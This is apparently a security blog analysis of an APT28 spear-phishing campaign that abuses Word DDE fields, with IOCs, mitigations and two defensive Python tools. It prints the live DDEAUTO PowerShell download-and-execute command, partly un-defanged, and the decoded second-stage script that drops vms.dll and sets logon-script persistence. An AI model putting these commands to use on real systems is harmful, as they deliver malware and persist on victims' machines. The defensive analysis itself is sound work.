FancyBear Exploits NYC Terrorism Fears In Latest Spear Phishing Campaign

APT28’s latest campaign uses lures themed on a US Army exercise codenamed SabreGuardian and on the recent ISIS attack in Manhattan to spread malware.

APT28 (also known as FancyBear, Sofacy, Sednit and Pawn Storm), the Russian-speaking actors allegedly tied to the Kremlin, have launched another campaign. According to McAfee’s report it is thought to have started in late October, and it uses the recently publicised DDE technique in Microsoft Office to deliver the Seduploader reconnaissance tool to target machines in two stages.

The seemingly blank documents, named “IsisAttackInNewYork.docx” and “SabreGaurdian.docx”, reference current events: the recent attack in Manhattan claimed by ISIS, and the US Army exercise under way in Eastern Europe.

APT28 have shown that state-sponsored groups don’t always rely on zero-days: they pick up newly published techniques as soon as they appear, probably by following the large information security community on sites like Twitter, where the DDE technique had been widely discussed in the weeks before this campaign.


THE EXPLOIT

DDEDownloader is Microsoft’s name for documents that abuse DDE (Dynamic Data Exchange), a legacy protocol for transferring data between applications. The technique, also used to spread Locky and TrickBot, needs no macros and no memory-corruption exploit: a field such as DDEAUTO names an arbitrary executable as the DDE “server”, and Word launches it when the document’s links are updated on open. The user does have to accept two prompts, one to update linked data and one to start the named application, but both are generic dialogs that give no hint that a shell is about to be launched.

Analysis of one sample, “IsisAttackInNewYork.docx” shows how the DDEDownloader exploit is being used in the wild.

Filename: IsisAttackInNewYork.docx
SHA1: 1c6c700ceebfbe799e115582665105caa03c5c9e

C:\Programs\Microsoft\Office\MSWord.exe\..\..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoP -sta -NonI -W Hidden $e=(New-Object System.Net.WebClient).DownloadString('http://netmediaresources.com/config.txt');powershell -enc $e #.EXE

Once the user accepts the two DDE prompts, Word launches PowerShell with the arguments above. The \..\..\..\.. segments walk from the bogus Office path back up to the drive root, so the field resolves to \Windows\System32\WindowsPowerShell\v1.0\powershell.exe regardless of where Office is installed. PowerShell then issues a GET request to netmediaresources[.]com for config.txt, and the second stage it decodes from that file fetches vms.dll from the same host:

GET /config.txt HTTP/1.1
Host: netmediaresources.com
Connection: Keep-Alive

GET /media/resource/vms.dll HTTP/1.1
Host: netmediaresources.com
Connection: Keep-Alive
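As an added example (not code from the original post or from McAfee), the following Python scanner pulls DDE field codes out of a .docx the way a triage script would, joining the <w:instrText> runs that lures split up to evade simple string matching. It builds a minimal hypothetical lure in memory from the command quoted above (domain defanged) rather than touching the real sample, so it runs offline; the list of suspicious tokens is this example’s own choice.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape

W_NS = "http://schemas.openxmlformats.org/wordprocessingml/2006/main"
W = "{%s}" % W_NS

# A field code starting with DDE/DDEAUTO makes Word start the named DDE "server".
DDE_RE = re.compile(r"^\s*(DDEAUTO|DDE)\b", re.IGNORECASE)
# Strong signals in the field text (this example's own list): script hosts,
# download cmdlets and the "\..\" walk used to reach powershell.exe.
SUSPICIOUS_RE = re.compile(
    r"(powershell|cmd\.exe|mshta|rundll32|regsvr32|DownloadString|\\\.\.\\)",
    re.IGNORECASE)

# The DDE command quoted above (domain defanged), used as the field code of a
# hypothetical lure built in memory; the real lure document is never read.
SAMPLE_FIELD = (
    r"DDEAUTO C:\Programs\Microsoft\Office\MSWord.exe\..\..\..\..\Windows"
    r"\System32\WindowsPowerShell\v1.0\powershell.exe -NoP -sta -NonI -W Hidden "
    r"$e=(New-Object System.Net.WebClient).DownloadString('http://"
    r"netmediaresources[.]com/config.txt');powershell -enc $e")


def extract_field_codes(part_xml: bytes) -> list:
    """Return every field code in one WordprocessingML part: <w:fldSimple>
    instructions plus complex fields, whose text is spread over <w:instrText>
    runs between a fldChar "begin" and its "end". Lures split DDEAUTO over
    many runs to beat grep-style matching, so the runs are joined first."""
    root = ET.fromstring(part_xml)
    codes = [f.get(W + "instr", "") for f in root.iter(W + "fldSimple")]
    depth, buf = 0, []
    for el in root.iter():  # document order
        if el.tag == W + "fldChar":
            kind = el.get(W + "fldCharType")
            if kind == "begin":
                depth += 1
                if depth == 1:
                    buf = []
            elif kind == "end":
                depth -= 1
                if depth == 0:
                    codes.append("".join(buf))
        elif el.tag == W + "instrText" and depth > 0:
            buf.append(el.text or "")
    return codes


def scan_docx(data: bytes) -> list:
    """Scan an in-memory .docx and return one finding per DDE field."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        # Fields can also hide in headers and footers, not just the body.
        parts = [n for n in z.namelist() if n == "word/document.xml"
                 or re.match(r"word/(header|footer)\d*\.xml$", n)]
        for name in parts:
            for code in extract_field_codes(z.read(name)):
                if DDE_RE.match(code):
                    findings.append({"part": name,
                                     "field": " ".join(code.split()),
                                     "suspicious": bool(SUSPICIOUS_RE.search(code))})
    return findings


def build_sample_docx(field_code: str, split_runs: bool = True) -> bytes:
    """Build a minimal .docx holding one complex field (constructed test input).
    With split_runs the code is chopped into 7-character <w:instrText> runs."""
    pieces = ([field_code] if not split_runs else
              [field_code[i:i + 7] for i in range(0, len(field_code), 7)])
    runs = "".join('<w:r><w:instrText xml:space="preserve">%s</w:instrText></w:r>'
                   % escape(p) for p in pieces)
    document = (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        '<w:document xmlns:w="%s"><w:body><w:p>'
        '<w:r><w:fldChar w:fldCharType="begin"/></w:r>%s'
        '<w:r><w:fldChar w:fldCharType="separate"/></w:r>'
        '<w:r><w:t>Error! Not a valid link.</w:t></w:r>'
        '<w:r><w:fldChar w:fldCharType="end"/></w:r>'
        '</w:p></w:body></w:document>' % (W_NS, runs))
    content_types = (
        '<?xml version="1.0" encoding="UTF-8"?><Types xmlns="http://schemas.'
        'openxmlformats.org/package/2006/content-types"><Default Extension="rels" '
        'ContentType="application/vnd.openxmlformats-package.relationships+xml"/>'
        '<Override PartName="/word/document.xml" ContentType="application/vnd.'
        'openxmlformats-officedocument.wordprocessingml.document.main+xml"/></Types>')
    rels = (
        '<?xml version="1.0" encoding="UTF-8"?><Relationships xmlns="http://schemas.'
        'openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" '
        'Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/'
        'officeDocument" Target="word/document.xml"/></Relationships>')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml", content_types)
        z.writestr("_rels/.rels", rels)
        z.writestr("word/document.xml", document)
    return buf.getvalue()


if __name__ == "__main__":
    for hit in scan_docx(build_sample_docx(SAMPLE_FIELD)):
        print(hit["part"], "SUSPICIOUS" if hit["suspicious"] else "dde", hit["field"])
```

To use it on a real file, pass open(path, "rb").read() to scan_docx(). The scanner reports every DDE field, and flags as suspicious only those whose text names a script host, a download cmdlet or the directory-walk trick; a DDE field that merely links two Office documents is reported without the flag.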

The retrieved config.txt contains a second PowerShell command, Base64-encoded for PowerShell’s -enc switch (which expects UTF-16LE text under the Base64). It decodes as below:

$W=New-Object System.Net.WebClient;
$p=($Env:ALLUSERSPROFILE+"\vms.dll");                                  # drop path, normally C:\ProgramData\vms.dll
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};   # accept any TLS certificate
$W.DownloadFile("hxxp://netmediaresources[.]com/media/resource/vms.dll ",$p);
if (Test-Path $p){
$rd_p=$Env:SYSTEMROOT+"\System32\rundll32.exe";
$p_a=$p+",#1";                                                        # call export ordinal 1 of vms.dll
$pr=Start-Process $rd_p -ArgumentList $p_a;                           # run Seduploader now
$p_bat=($Env:ALLUSERSPROFILE+"\vms.bat");
$text='set inst_pck = "%ALLUSERSPROFILE%\vms.dll"'+"`r`n"+'if NOT exist %inst_pck % (exit)'+"`r`n"+'start rundll32.exe %inst_pck %,#1'
[io.File]::WriteAllText($p_bat,$text)                                 # logon script that re-launches the DLL
New-Item -Path 'HKCU:\Environment' -Force | Out-Null;
New-ItemProperty -Path 'HKCU:\Environment' -Name 'UserInitMprLogonScript' -Value "$p_bat" -PropertyType String -Force | Out-Null;   # persistence
}

The decoded script fetches vms.dll from netmediaresources[.]com/media/resource/vms.dll; the DLL is Seduploader, APT28’s own reconnaissance tool:

Filename: vms.dll
File Description: Version Master Service
File version: 5.1.9200.20789
Compilation timestamp: 2017-10-31 20:11:10
SHA1: 4bc722a9b0492a50bd86a1341f02c74c0d773db7
C2: webviewres[.]net

Persistence is established by the downloader script rather than by Seduploader itself: the New-ItemProperty cmdlet writes the path of vms.bat into the UserInitMprLogonScript value under HKCU\Environment, which Windows treats as a logon script. Because the value lives in HKCU it fires only when the compromised user logs on, even though vms.bat and vms.dll are dropped into the shared %ALLUSERSPROFILE% (C:\ProgramData) directory. The batch file itself only checks that vms.dll still exists and restarts it through rundll32.exe, export #1.
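The decoding step described above, as an added Python example that is not part of the original post: it re-encodes the page’s own decoded script (domain defanged) the way -enc expects, Base64 over UTF-16LE, decodes it back, and pulls out the download URL, the paths built from environment variables, the LOLBin used and the UserInitMprLogonScript persistence value. The regular expressions are this example’s own and tuned to this script; they are not a general PowerShell parser.

```python
import base64
import re

# The decoded second stage quoted above (domain defanged), used here as
# constructed input in place of the real config.txt.
STAGE2 = r'''$W=New-Object System.Net.WebClient;
$p=($Env:ALLUSERSPROFILE+"\vms.dll");
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};
$W.DownloadFile("hxxp://netmediaresources[.]com/media/resource/vms.dll ",$p);
if (Test-Path $p){
$rd_p=$Env:SYSTEMROOT+"\System32\rundll32.exe";
$p_a=$p+",#1";
$pr=Start-Process $rd_p -ArgumentList $p_a;
$p_bat=($Env:ALLUSERSPROFILE+"\vms.bat");
$text='set inst_pck = "%ALLUSERSPROFILE%\vms.dll"'+"`r`n"+'if NOT exist %inst_pck % (exit)'+"`r`n"+'start rundll32.exe %inst_pck %,#1'
[io.File]::WriteAllText($p_bat,$text)
New-Item -Path 'HKCU:\Environment' -Force | Out-Null;
New-ItemProperty -Path 'HKCU:\Environment' -Name 'UserInitMprLogonScript' -Value "$p_bat" -PropertyType String -Force | Out-Null;
}'''


def encode_for_enc(script: str) -> str:
    """Produce a `powershell -enc` argument: Base64 of the UTF-16LE script."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def is_utf16le_text(raw: bytes) -> bool:
    """Heuristic for -enc payloads: ASCII PowerShell stored as UTF-16LE has a
    NUL in every odd byte. Decoding such a blob as UTF-8 does not fail, it just
    yields NUL-riddled text, which is why naive one-liners miss the IOCs."""
    return len(raw) % 2 == 0 and len(raw) > 0 and all(b == 0 for b in raw[1::2])


def decode_enc(blob: str) -> str:
    """Decode a -enc argument, falling back to UTF-8 for ordinary Base64."""
    raw = base64.b64decode(blob)
    return raw.decode("utf-16-le") if is_utf16le_text(raw) else raw.decode("utf-8")


def extract_iocs(script: str) -> dict:
    """Pull the indicators an analyst wants from the decoded downloader."""
    env_paths = re.findall(r'\$Env:(\w+)\+"(\\[^"]+)"', script)
    reg = re.findall(r"New-ItemProperty\s+-Path\s+'([^']+)'\s+-Name\s+'([^']+)'", script)
    return {
        "urls": sorted(set(re.findall(r"""h[xt]{2}ps?://[^\s"']+""", script))),
        "env_paths": sorted({"%%%s%%%s" % (var, path) for var, path in env_paths}),
        "registry": ["%s\\%s" % (path, name) for path, name in reg],
        "lolbins": sorted({m.lower() for m in re.findall(
            r"\b(rundll32|regsvr32|mshta|certutil|wscript|cscript)\b", script, re.I)}),
        # Turning off certificate validation lets the DLL be fetched over any TLS cert.
        "cert_validation_disabled":
            "ServerCertificateValidationCallback = {$true}" in script,
    }


if __name__ == "__main__":
    blob = encode_for_enc(STAGE2)          # what config.txt would carry
    for key, value in extract_iocs(decode_enc(blob)).items():
        print(key, value)
```

Given a real config.txt, pass its contents to decode_enc() instead of re-encoding STAGE2; the UTF-16LE check is what distinguishes a -enc payload from a plain Base64 blob.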


Seduploader then profiles the host and reports back to the C2 so that the operators can decide whether the victim is of interest; if it is, a second-stage implant such as X-Agent is usually delivered.

DOMAINS

The distribution site, netmediaresources[.]com, was registered on 2017-10-19 with Tucows Domains Inc.:

Registrar: Tucows Domains Inc.
Organization: 1337 Services LLC (registrant, admin, tech)
NameServers: ns1.njal.la, ns2.njal.la

The C2, webviewres[.]net, was registered on 2017-10-25, also with Tucows Domains Inc. The two domains share the same nameservers and the same registrant, 1337 Services LLC, which is the Njalla privacy-registration service, so the WHOIS data identifies nobody:

Registrar: Tucows Domains Inc.
Organization: 1337 Services LLC (registrant, admin, tech)
NameServers: ns1.njal.la, ns2.njal.la

MITIGATION

The DDE exploit has been recognized and classified by Microsoft as Exploit:O97M/DDEDownloader.A. Mitigation methods are outlined in Microsoft Security Advisory 4053440.

The advisory’s Word mitigation is a registry value that stops Word updating links, DDE included, automatically when a document is opened. <version> is the Office version (14.0 for 2010, 15.0 for 2013, 16.0 for 2016); the advisory lists equivalent values for Excel and Outlook. A user who updates links manually can still trigger the DDE prompts, so the setting reduces rather than removes the exposure.

[HKEY_CURRENT_USER\Software\Microsoft\Office\<version>\Word\Options]
DontUpdateLinks(DWORD)=1

For Microsoft Office 2007, the registry entry is slightly different:

[HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Word\Options\vpref]
fNoCalclinksOnopen_90_1(DWORD)=1

The Windows 10 Fall Creators Update adds Windows Defender Exploit Guard, whose Attack Surface Reduction (ASR) rule “Block all Office applications from creating child processes” stops Word from spawning powershell.exe the way DDEDownloader documents require, independently of any per-application registry setting.

Additionally, NVISO have published YARA rules for detecting DDE fields in Office documents.


ARTEFACTS

webviewres.net
netmediaresources.com

185.216.35.26
89.34.111.160
5.104.105.195

1c6c700ceebfbe799e115582665105caa03c5c9e
4bc722a9b0492a50bd86a1341f02c74c0d773db7
f6d380b256b0e66ef347adc78195fd0f228b3e33

HYBRID ANALYSIS

https://www.hybrid-analysis.com/sample/55fc23f006b9beb777ab1423af4cd6b2a10ca1e144a0580b2ec85c321732c036?environmentId=100

https://www.hybrid-analysis.com/sample/11cd541511cc793e7416655cda1e100d0a70fb043dfe7f6664564b91733431d0?environmentId=100

Corrections, comments: @0x736a
Image: Crowdstrike